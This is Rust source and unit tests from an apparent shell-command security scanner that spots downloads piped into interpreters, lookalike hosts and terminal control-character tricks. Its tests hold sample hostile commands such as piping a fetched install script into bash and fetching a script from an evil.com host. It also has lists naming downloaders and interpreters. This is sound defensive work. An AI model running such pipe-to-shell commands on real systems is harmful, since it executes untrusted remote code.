915fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
916    let mut i = 0;
917    while i < args.len() {
918        let clean = strip_quotes(&args[i]);
919        if clean == "--" {
920            i += 1;
921            break;
922        }
923        if clean.starts_with('-') {
924            i += 1;
925            continue;
926        }
927        break;
928    }
929    args.get(i)
930        .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
931}
932
933fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
934    let mut i = 0;
935    while i < args.len() {
936        let clean = strip_quotes(&args[i]);
937        if clean == "--" {
938            i += 1;
939            break;
940        }
941        if clean.starts_with('-') {
942            if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
943                i += 2;
944            } else {
945                i += 1;
946            }
947            continue;
948        }
949        break;
950    }
951    args.get(i)
952        .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
953}
954
955fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
956    let subcommand = args.first().map(|arg| command_base_name(arg))?;
957    match subcommand.as_str() {
958        "run" => Some(ResolvedCommand {
959            name: "tirith-run".to_string(),
960            args: &args[1..],
961        }),
962        _ => Some(ResolvedCommand {
963            name: "tirith".to_string(),
964            args,
965        }),
966    }
967}
968
/// Whether a tirith subcommand is an "inspection" command — one whose purpose
/// is to describe/score a suspicious input that the user deliberately typed,
/// not execute it. For these we suppress URL extraction and the exec-context
/// byte-scan carveout.
///
/// **Deliberately narrow** — only the "here's a suspicious input, tell me
/// about it" commands belong here. Adding anything else (e.g. `doctor`,
/// `init`, `setup`, `version`) requires a motivating false-positive fixture.
fn is_tirith_inspection_subcommand(sub: &str) -> bool {
    const INSPECTION_SUBCOMMANDS: &[&str] = &["diff", "score", "why", "receipt", "explain"];
    INSPECTION_SUBCOMMANDS.contains(&sub)
}
980
981/// Resolve the first segment of `input` as a potential tirith inspection
982/// subcommand. When matched, return the byte range (within `input`) of the
983/// arg span that follows the subcommand word — the inert region that should
984/// be skipped by URL extraction and Unicode-style byte scans.
985///
986/// Returns `None` for:
987/// - non-tirith commands
988/// - `tirith run` (a sink — URL analysis still applies)
989/// - tirith subcommands not on the narrow inspection list
990/// - inputs where the first segment doesn't tokenize cleanly
991///
992/// Resolves through `env`, `command`, `time`, and `sudo`-style wrappers by
993/// delegating to `resolve_named_command`. Leading flags like
994/// `tirith --quiet diff URL` are handled — the subcommand word is the first
995/// non-flag argument.
996///
997/// Only the FIRST segment's arg span is returned; later pipeline segments
998/// (`tirith diff foo | grep bar`) are still analyzed normally.
999pub fn tirith_inert_arg_range(input: &str, shell: ShellType) -> Option<std::ops::Range<usize>> {
1000    let segments = tokenize::tokenize(input, shell);
1001    let first = segments.first()?;
1002
1003    // Resolve the segment's command through wrappers — must end at "tirith".
1004    let resolved = resolve_segment_command(first)?;
1005    if resolved.name != "tirith" {
1006        return None;
1007    }
1008
1009    // Find the first non-flag arg (the subcommand). Start from args[0] because
1010    // resolve_tirith_command already strips wrapper prefixes.
1011    let mut sub_idx = 0;
1012    while sub_idx < resolved.args.len() {
1013        let clean = strip_quotes(&resolved.args[sub_idx]);
1014        if clean.starts_with('-') {
1015            sub_idx += 1;
1016            continue;
1017        }
1018        break;
1019    }
1020    let sub_arg = resolved.args.get(sub_idx)?;
1021    let subcommand = command_base_name(sub_arg);
1022    if !is_tirith_inspection_subcommand(&subcommand) {
1023        return None;
1024    }
1025
1026    // The inert range is everything after the subcommand word within this
1027    // segment. Locate the subcommand token inside the segment's byte range
1028    // by scanning for a whitespace-delimited match, not a raw substring find.
1029    // Otherwise `tirith --config=diff diff URL` would match the `diff` inside
1030    // `--config=diff` and the inert range would start too early.
1031    let seg_slice = input.get(first.byte_range.clone())?;
1032    let sub_rel = find_subcommand_token(seg_slice, sub_arg.as_str())?;
1033    let inert_start = first.byte_range.start + sub_rel + sub_arg.len();
1034    let inert_end = first.byte_range.end;
1035    if inert_start >= inert_end {
1036        return None;
1037    }
1038    Some(inert_start..inert_end)
1039}
1040
/// Find the byte offset within `haystack` where the subcommand token
/// `needle` begins — matching only when preceded by start-of-string or
/// whitespace AND followed by whitespace or end-of-string. Prevents
/// `--config=diff` from matching `diff`, and `differ` from matching `diff`.
fn find_subcommand_token(haystack: &str, needle: &str) -> Option<usize> {
    let bytes = haystack.as_bytes();
    let n = needle.len();
    let mut search_from = 0;
    loop {
        // `abs + 1` below may land inside a multi-byte character when a
        // rejected match starts with one; advance to the next char boundary
        // so the slice is valid. (The old code's `haystack.get(..)?` bailed
        // out with `None` on a mid-char index, silently skipping later valid
        // matches for non-ASCII needles.)
        while search_from < haystack.len() && !haystack.is_char_boundary(search_from) {
            search_from += 1;
        }
        let rel = haystack.get(search_from..)?.find(needle)?;
        let abs = search_from + rel;
        let starts_token =
            abs == 0 || matches!(bytes.get(abs - 1), Some(b) if b.is_ascii_whitespace());
        // Word boundary on the right as well (whitespace or end-of-string).
        let ends_token = abs + n == bytes.len()
            || matches!(bytes.get(abs + n), Some(b) if b.is_ascii_whitespace());
        if starts_token && ends_token {
            return Some(abs);
        }
        search_from = abs + 1;
    }
}
1063
1064/// Check if a segment is in a "sink" context (executing/downloading).
1065fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
1066    if let Some(cmd) = resolve_segment_command(segment) {
1067        let cmd_lower = cmd.name;
1068        // git is only a sink for download subcommands (clone, fetch, pull, etc.)
1069        if cmd_lower == "git" {
1070            return is_git_sink(cmd.args);
1071        }
1072        if is_source_command(&cmd_lower) {
1073            return true;
1074        }
1075    }
1076
1077    // Check if this segment pipes into a sink
1078    if let Some(sep) = &segment.preceding_separator {
1079        if sep == "|" || sep == "|&" {
1080            // This segment receives piped input — check if it's an interpreter
1081            if let Some(cmd) = resolve_segment_command(segment) {
1082                if is_interpreter(&cmd.name) {
1083                    return true;
1084                }
1085            }
1086        }
1087    }
1088
1089    false
1090}
1091
/// Commands that fetch remote content (downloaders, package managers,
/// container runtimes, PowerShell web cmdlets, and the `tirith-run` sink).
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl",
        "wget",
        "http",
        "https",
        "xh",
        "fetch",
        "scp",
        "rsync",
        "docker",
        "podman",
        "nerdctl",
        "pip",
        "pip3",
        "npm",
        "npx",
        "yarn",
        "pnpm",
        "go",
        "cargo",
        "iwr",
        "irm",
        "invoke-webrequest",
        "invoke-restmethod",
        "tirith-run",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
1121
/// Parsed scp/rsync remote spec of shape `[user@]host:path`, returned by
/// [`parse_scp_remote_spec`] so callers (e.g. `network_deny` enforcement)
/// can route on the host without re-parsing.
///
/// Shell-aware parsing: the Windows drive-letter guard is narrow on
/// Posix/Fish (single-letter SSH aliases like `scp file x:/tmp/` are
/// legitimate there), wider on PowerShell/Cmd so drive letters do not
/// masquerade as remote specs.
pub struct ScpRemoteSpec {
    /// The `user` portion before `@`, verbatim, when present.
    pub user: Option<String>,
    /// Host portion; shape validated by `is_valid_scp_host`.
    pub host: String,
    /// Literal remainder after the first `:` — no normalization applied.
    /// Empty for a bare `user@host` spec.
    pub path: String,
}
1140
1141/// Parse `[user@]host:path` from an scp/rsync argument.
1142///
1143/// Accepts `host:path` and `user@host:path`. Rejects:
1144/// - tokens without `:` → plain local path
1145/// - tokens starting with `-` → flag
1146/// - tokens containing `://` → URL scheme
1147/// - `:` preceded by `/` → absolute local path that happens to contain `:`
1148/// - empty host part, or host containing `/`
1149/// - Windows drive-letter shapes (see below)
1150///
1151/// Windows drive-letter guard — deliberately narrow so it doesn't break
1152/// legitimate one-letter SSH aliases (e.g. `scp file x:/tmp/`):
1153/// - `X:\...` — reject ALWAYS; backslash after a drive letter is never scp.
1154/// - `X:/...` — reject ONLY on PowerShell/Cmd; POSIX treats this as an alias.
1155/// - `X:foo`  — ACCEPT everywhere; ambiguous with scp's `x:relative-path`,
1156///   and preserving back-compat here beats over-rejection.
1157pub fn parse_scp_remote_spec(arg: &str, shell: ShellType) -> Option<ScpRemoteSpec> {
1158    if arg.is_empty() || arg.starts_with('-') || arg.contains("://") {
1159        return None;
1160    }
1161
1162    // Two accepted shapes:
1163    //   1. `user@host[:path]` — the colon is optional. Strict scp requires it,
1164    //      but we also accept bare `user@host` to suppress a false positive
1165    //      where `looks_like_schemeless_host` would otherwise flag it.
1166    //   2. `host:path` — no `@`, colon required.
1167    if let Some(at_pos) = arg.find('@') {
1168        let before_at = &arg[..at_pos];
1169        let after_at = &arg[at_pos + 1..];
1170        if before_at.is_empty() || after_at.is_empty() || before_at.contains(':') {
1171            return None;
1172        }
1173        let (host, path) = match after_at.find(':') {
1174            Some(colon_pos) => {
1175                // `:` preceded by `/` in after_at means a colon inside a path, not
1176                // a host:path boundary. Unusual but safe to reject.
1177                if colon_pos > 0 && after_at.as_bytes()[colon_pos - 1] == b'/' {
1178                    return None;
1179                }
1180                (
1181                    &after_at[..colon_pos],
1182                    after_at[colon_pos + 1..].to_string(),
1183                )
1184            }
1185            None => (after_at, String::new()),
1186        };
1187        if !is_valid_scp_host(host) {
1188            return None;
1189        }
1190        return Some(ScpRemoteSpec {
1191            user: Some(before_at.to_string()),
1192            host: host.to_string(),
1193            path,
1194        });
1195    }
1196
1197    // No `@` — must have `host:path` with an explicit colon.
1198    let colon_pos = arg.find(':')?;
1199    if colon_pos > 0 && arg.as_bytes()[colon_pos - 1] == b'/' {
1200        return None;
1201    }
1202    let host = &arg[..colon_pos];
1203    let after_colon = &arg[colon_pos + 1..];
1204    if !is_valid_scp_host(host) {
1205        return None;
1206    }
1207
1208    // Windows drive-letter guard — only applies when host is a single ASCII
1209    // letter AND `user@` is absent (see module doc above for shape breakdown).
1210    if host.len() == 1 && host.chars().next().unwrap().is_ascii_alphabetic() {
1211        let first_after = after_colon.chars().next();
1212        match first_after {
1213            Some('\\') => return None,
1214            Some('/') if matches!(shell, ShellType::PowerShell | ShellType::Cmd) => {
1215                return None;
1216            }
1217            _ => {}
1218        }
1219    }
1220
1221    Some(ScpRemoteSpec {
1222        user: None,
1223        host: host.to_string(),
1224        path: after_colon.to_string(),
1225    })
1226}
1227
/// A plausible scp host: non-empty, every character ASCII alphanumeric or
/// one of `.`, `_`, `-`. The character whitelist already excludes `/` and
/// `:`, so the previous explicit `contains` checks for those were redundant.
fn is_valid_scp_host(host: &str) -> bool {
    !host.is_empty()
        && host
            .chars()
            .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
}
1236
1237/// Check if a git command is in a sink context (only subcommands that download).
1238/// `git add`, `git commit`, `git status`, etc. are NOT sinks.
1239fn is_git_sink(args: &[String]) -> bool {
1240    if args.is_empty() {
1241        return false;
1242    }
1243    // First non-flag arg is the subcommand
1244    for arg in args {
1245        let clean = strip_quotes(arg);
1246        if clean.starts_with('-') {
1247            continue;
1248        }
1249        return matches!(
1250            clean.as_str(),
1251            "clone" | "fetch" | "pull" | "submodule" | "remote"
1252        );
1253    }
1254    false
1255}
1256
/// Commands that execute piped input: shells, scripting-language runtimes,
/// and the PowerShell Invoke-Expression forms.
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh",
        "bash",
        "zsh",
        "dash",
        "ksh",
        "python",
        "python3",
        "node",
        "perl",
        "ruby",
        "php",
        "iex",
        "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
1274
1275/// Check if an arg at the given index is the value of an output-file or credential flag
1276/// for the given command. Returns true if this arg should be skipped during schemeless
1277/// URL detection (output filenames and auth credentials can look like domains).
1278fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
1279    let cmd_lower = cmd.to_lowercase();
1280    let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
1281
1282    match cmd_base {
1283        "curl" => {
1284            if arg_index > 0 {
1285                let prev = strip_quotes(&args[arg_index - 1]);
1286                if prev == "-o"
1287                    || prev == "--output"
1288                    || prev == "-u"
1289                    || prev == "--user"
1290                    || prev == "-U"
1291                    || prev == "--proxy-user"
1292                {
1293                    return true;
1294                }
1295            }
1296            let current = strip_quotes(&args[arg_index]);
1297            if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
1298                return true;
1299            }
1300            if current.starts_with("--output=")
1301                || current.starts_with("--user=")
1302                || current.starts_with("--proxy-user=")
1303            {
1304                return true;
1305            }
1306            false
1307        }
1308        "wget" => {
1309            if arg_index > 0 {
1310                let prev = strip_quotes(&args[arg_index - 1]);
1311                if prev == "-O"
1312                    || prev == "--output-document"
1313                    || prev == "--user"
1314                    || prev == "--password"
1315                    || prev == "--http-user"
1316                    || prev == "--http-password"
1317                    || prev == "--ftp-user"
1318                    || prev == "--ftp-password"
1319                    || prev == "--proxy-user"
1320                    || prev == "--proxy-password"
1321                {
1322                    return true;
1323                }
1324            }
1325            let current = strip_quotes(&args[arg_index]);
1326            if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
1327                return true;
1328            }
1329            if current.starts_with("--output-document=")
1330                || current.starts_with("--user=")
1331                || current.starts_with("--password=")
1332                || current.starts_with("--http-user=")
1333                || current.starts_with("--http-password=")
1334                || current.starts_with("--ftp-user=")
1335                || current.starts_with("--ftp-password=")
1336                || current.starts_with("--proxy-user=")
1337                || current.starts_with("--proxy-password=")
1338            {
1339                return true;
1340            }
1341            false
1342        }
1343        "http" | "https" | "xh" => {
1344            if arg_index > 0 {
1345                let prev = strip_quotes(&args[arg_index - 1]);
1346                if prev == "-a" || prev == "--auth" {
1347                    return true;
1348                }
1349            }
1350            let current = strip_quotes(&args[arg_index]);
1351            if current.starts_with("--auth=") {
1352                return true;
1353            }
1354            false
1355        }
1356        _ => false,
1357    }
1358}
1359
/// Trim whitespace, then remove one matching pair of surrounding quotes
/// (`"…"` or `'…'`). Mismatched or lone quotes are left untouched.
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    for quote in ['"', '\''] {
        if let Some(inner) = trimmed
            .strip_prefix(quote)
            .and_then(|rest| rest.strip_suffix(quote))
        {
            return inner.to_string();
        }
    }
    trimmed.to_string()
}
1370
/// Heuristic: does this token look like a bare domain (a schemeless URL)?
fn looks_like_schemeless_host(s: &str) -> bool {
    // File extensions whose presence on a path-less token marks it as a
    // filename, not a domain.
    const FILE_EXTS: &[&str] = &[
        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt",
        ".md", ".json", ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz",
        ".tar.bz2", ".tar.xz", ".tgz", ".zip", ".gz", ".bz2", ".rpm", ".deb",
        ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log", ".conf",
        ".cfg", ".ini", ".toml", ".png", ".jpg", ".jpeg", ".gif", ".bmp",
        ".ico", ".tiff", ".tif", ".pdf", ".csv", ".mp3", ".mp4", ".wav",
        ".avi", ".mkv", ".flac", ".ogg", ".webm", ".ttf", ".otf", ".woff",
        ".woff2", ".docx", ".xlsx", ".pptx", ".sqlite", ".lock", ".example",
        ".local", ".bak", ".tmp", ".swp", ".orig", ".patch", ".diff", ".map",
        ".env", ".sample", ".dist", ".editorconfig",
    ];

    // Flags are out, as is anything without a dot. Dotfiles and hidden files
    // (e.g. .gitignore, .env.example) are not URLs either.
    if s.starts_with('-') || s.starts_with('.') || !s.contains('.') {
        return false;
    }

    // The leading component (up to the first `/`) must look like a domain.
    let host_part = s.split('/').next().unwrap_or(s);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }

    // "Meaningful path" = something non-empty after the first slash, where a
    // lone extra `/` doesn't count. With a real path (e.g. evil.zip/payload)
    // the host part is likely a genuine domain even when its TLD overlaps a
    // file extension; without one, a file-like ending (install.sh) means
    // filename, and a bare trailing slash (file.sh/) is still a filename.
    let has_meaningful_path = s
        .find('/')
        .is_some_and(|idx| !matches!(&s[idx + 1..], "" | "/"));
    if !has_meaningful_path {
        let lowered = host_part.to_lowercase();
        if FILE_EXTS.iter().any(|ext| lowered.ends_with(ext)) {
            return false;
        }
    }

    // At least two dot-separated labels ("example.com", not just "file"),
    // and the TLD must be 2-63 alphabetic chars (DNS label maximum).
    if host_part.split('.').count() < 2 {
        return false;
    }
    let tld = host_part.rsplit('.').next().unwrap_or("");
    (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
}
1488
/// Host component of a schemeless URL: everything before the first `/`.
fn extract_host_from_schemeless(s: &str) -> String {
    match s.find('/') {
        Some(idx) => s[..idx].to_string(),
        None => s.to_string(),
    }
}
1492
/// Path component of a schemeless URL: the first `/` and everything after
/// it, or the empty string when there is no path.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |idx| s[idx..].to_string())
}
1500
1501#[cfg(test)]
1502mod tests {
1503    use super::*;
1504
    // --- Tier 1 fast-path scan: must fire on URLs, pipes into shells,
    // scp-style git refs, registry refs, and (paste-only) non-ASCII, while
    // staying quiet on benign local commands.

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!tier1_scan("ls -la", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(tier1_scan("something | bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(tier1_scan("something | env bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        // Absolute interpreter path must be caught too.
        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(tier1_scan(
            "git clone git@github.com:user/repo",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(tier1_scan(
            "curl https://xn--example-cua.com",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(tier1_scan(
            "iwr https://evil.com/script.ps1",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(tier1_scan(
            "curl https://example.com/install.sh",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        // `.zip` is a real TLD as well as a file extension.
        assert!(tier1_scan("open file.zip", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        // Non-ASCII is a paste-only pattern (homoglyph smuggling).
        assert!(tier1_scan("café", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        // Non-ASCII should NOT trigger exec-time scan
        assert!(!tier1_scan("echo café", ScanContext::Exec));
    }
1602
    // --- Byte scan: each control-character family sets exactly its own flag,
    // and clean input sets none.

    #[test]
    fn test_byte_scan_ansi() {
        let input = b"hello \x1b[31mred\x1b[0m world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        // Bare carriage return (line-rewriting trick).
        let input = b"hello\rworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        // U+202E RIGHT-TO-LEFT OVERRIDE.
        let input = "hello\u{202E}dlrow".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        // U+200B ZERO WIDTH SPACE.
        let input = "hel\u{200B}lo".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let input = b"hello world\n";
        let result = scan_bytes(input);
        assert!(!result.has_ansi_escapes);
        assert!(!result.has_control_chars);
        assert!(!result.has_bidi_controls);
        assert!(!result.has_zero_width);
    }
1640
    // --- URL extraction: sink-context tagging, env-assignment handling,
    // and the proxy-variable carveout.

    #[test]
    fn test_extract_urls_basic() {
        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(urls.len(), 1);
        assert_eq!(urls[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_from_leading_env_assignment() {
        let urls = extract_urls(
            "PAYLOAD_URL=https://example.com/install.sh curl ok",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
            "leading env assignment URL should be extracted in sink context"
        );
    }

    #[test]
    fn test_extract_urls_from_quoted_leading_env_assignment() {
        let urls = extract_urls(
            "PAYLOAD_URL='https://example.com/install.sh' curl ok",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "https://example.com/install.sh"),
            "quoted leading env assignment URL should be extracted"
        );
    }

    #[test]
    fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
        // *_PROXY variables configure routing; their URLs are not downloads.
        let urls = extract_urls(
            "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
            ShellType::Posix,
        );
        assert!(
            !urls.iter().any(|u| u.raw == "http://proxy:8080"),
            "proxy configuration URLs should not be treated as destinations"
        );
    }

    #[test]
    fn test_extract_urls_pipe() {
        let urls = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!urls.is_empty());
        assert!(urls[0].in_sink_context);
    }
1695
1696    #[test]
1697    fn test_extract_urls_scp() {
1698        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
1699        assert!(!urls.is_empty());
1700        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
1701    }
1702
1703    #[test]
1704    fn test_extract_docker_ref() {
1705        let urls = extract_urls("docker pull nginx", ShellType::Posix);
1706        let docker_urls: Vec<_> = urls
1707            .iter()
1708            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1709            .collect();
1710        assert_eq!(docker_urls.len(), 1);
1711    }
1712
1713    #[test]
1714    fn test_extract_powershell_iwr() {
1715        let urls = extract_urls(
1716            "iwr https://example.com/script.ps1 | iex",
1717            ShellType::PowerShell,
1718        );
1719        assert!(!urls.is_empty());
1720    }
1721
1722    #[test]
1723    fn test_wrapper_preserves_sink_context() {
1724        let urls = extract_urls(
1725            "env --ignore-environment curl http://example.com",
1726            ShellType::Posix,
1727        );
1728        assert!(
1729            urls.iter()
1730                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1731            "wrapped sink commands should keep sink context"
1732        );
1733    }
1734
1735    #[test]
1736    fn test_env_wrapper_preserves_tirith_run_sink_context() {
1737        let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
1738        assert!(
1739            urls.iter()
1740                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1741            "env wrapper should preserve tirith run sink context"
1742        );
1743    }
1744
1745    #[test]
1746    fn test_command_wrapper_preserves_tirith_run_sink_context() {
1747        let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
1748        assert!(
1749            urls.iter()
1750                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1751            "command wrapper should preserve tirith run sink context"
1752        );
1753    }
1754
1755    #[test]
1756    fn test_time_wrapper_preserves_tirith_run_sink_context() {
1757        let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
1758        assert!(
1759            urls.iter()
1760                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1761            "time wrapper should preserve tirith run sink context"
1762        );
1763    }
1764
1765    #[test]
1766    fn test_strip_quotes_single_char() {
1767        assert_eq!(strip_quotes("\""), "\"");
1768        assert_eq!(strip_quotes("'"), "'");
1769    }
1770
1771    #[test]
1772    fn test_strip_quotes_empty() {
1773        assert_eq!(strip_quotes(""), "");
1774    }
1775
1776    #[test]
1777    fn test_scan_bytes_bel_vt_del() {
1778        // BEL (0x07)
1779        let input = b"hello\x07world";
1780        let result = scan_bytes(input);
1781        assert!(result.has_control_chars);
1782
1783        // VT (0x0B)
1784        let input = b"hello\x0Bworld";
1785        let result = scan_bytes(input);
1786        assert!(result.has_control_chars);
1787
1788        // FF (0x0C)
1789        let input = b"hello\x0Cworld";
1790        let result = scan_bytes(input);
1791        assert!(result.has_control_chars);
1792
1793        // DEL (0x7F)
1794        let input = b"hello\x7Fworld";
1795        let result = scan_bytes(input);
1796        assert!(result.has_control_chars);
1797    }
1798
1799    #[test]
1800    fn test_scan_bytes_osc_apc_dcs() {
1801        // OSC: \e]
1802        let input = b"hello\x1b]0;title\x07world";
1803        let result = scan_bytes(input);
1804        assert!(result.has_ansi_escapes);
1805
1806        // APC: \e_
1807        let input = b"hello\x1b_dataworld";
1808        let result = scan_bytes(input);
1809        assert!(result.has_ansi_escapes);
1810
1811        // DCS: \eP
1812        let input = b"hello\x1bPdataworld";
1813        let result = scan_bytes(input);
1814        assert!(result.has_ansi_escapes);
1815    }
1816
1817    #[test]
1818    fn test_schemeless_long_tld() {
1819        assert!(looks_like_schemeless_host("example.academy"));
1820        assert!(looks_like_schemeless_host("example.photography"));
1821    }
1822
1823    #[test]
1824    fn test_segment_index_correct() {
1825        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
1826        // Each URL should have the segment index of the segment it came from
1827        for url in &urls {
1828            // segment_index should be 0 or 1, not an incrementing counter
1829            assert!(url.segment_index <= 1);
1830        }
1831    }
1832
1833    #[test]
1834    fn test_docker_build_context_not_image() {
1835        let urls = extract_urls("docker build .", ShellType::Posix);
1836        let docker_urls: Vec<_> = urls
1837            .iter()
1838            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1839            .collect();
1840        assert_eq!(
1841            docker_urls.len(),
1842            0,
1843            "build context '.' should not be treated as image"
1844        );
1845    }
1846
1847    #[test]
1848    fn test_docker_image_subcmd() {
1849        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
1850        let docker_urls: Vec<_> = urls
1851            .iter()
1852            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1853            .collect();
1854        assert_eq!(docker_urls.len(), 1);
1855    }
1856
1857    #[test]
1858    fn test_docker_run_image_after_double_dash() {
1859        let urls = extract_urls(
1860            "docker run --rm -- evil.registry/ns/img:1",
1861            ShellType::Posix,
1862        );
1863        let docker_urls: Vec<_> = urls
1864            .iter()
1865            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1866            .collect();
1867        assert_eq!(docker_urls.len(), 1);
1868        assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
1869    }
1870
1871    /// Module-boundary enforcement: guarantees no tier-1 extractor exists
1872    /// outside the declarative pattern table in `build.rs`.
1873    #[test]
1874    fn test_tier1_module_boundary_enforcement() {
1875        let ids = tier1_generated::EXTRACTOR_IDS;
1876        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
1877        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
1878        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
1879        assert!(exec_count > 0, "Must have exec fragments");
1880        assert!(
1881            paste_count >= exec_count,
1882            "Paste fragments must be superset of exec fragments"
1883        );
1884        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
1885            .expect("Generated exec pattern must be valid regex");
1886        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
1887            .expect("Generated paste pattern must be valid regex");
1888    }
1889
1890    #[test]
1891    fn test_scan_bytes_trailing_cr_not_flagged() {
1892        let result = scan_bytes(b"/path\r");
1893        assert!(
1894            !result.has_control_chars,
1895            "trailing \\r should not be flagged"
1896        );
1897    }
1898
1899    #[test]
1900    fn test_scan_bytes_trailing_crlf_not_flagged() {
1901        let result = scan_bytes(b"/path\r\n");
1902        assert!(
1903            !result.has_control_chars,
1904            "trailing \\r\\n should not be flagged"
1905        );
1906    }
1907
1908    #[test]
1909    fn test_scan_bytes_windows_multiline_not_flagged() {
1910        let result = scan_bytes(b"line1\r\nline2\r\n");
1911        assert!(
1912            !result.has_control_chars,
1913            "Windows \\r\\n line endings should not be flagged"
1914        );
1915    }
1916
1917    #[test]
1918    fn test_scan_bytes_embedded_cr_still_flagged() {
1919        let result = scan_bytes(b"safe\rmalicious");
1920        assert!(
1921            result.has_control_chars,
1922            "embedded \\r before non-\\n should be flagged"
1923        );
1924    }
1925
1926    #[test]
1927    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
1928        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
1929        assert!(
1930            result.has_control_chars,
1931            "attack \\r mixed with \\r\\n should be flagged"
1932        );
1933    }
1934
1935    #[test]
1936    fn test_scan_bytes_only_cr() {
1937        let result = scan_bytes(b"\r");
1938        assert!(
1939            !result.has_control_chars,
1940            "lone trailing \\r should not be flagged"
1941        );
1942    }
1943
1944    #[test]
1945    fn test_schemeless_skip_curl_output_flag() {
1946        // `-o <filename>` is curl's output flag; the filename must not be
1947        // treated as a schemeless URL even though it matches the host shape.
1948        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
1949        let schemeless: Vec<_> = urls
1950            .iter()
1951            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1952            .collect();
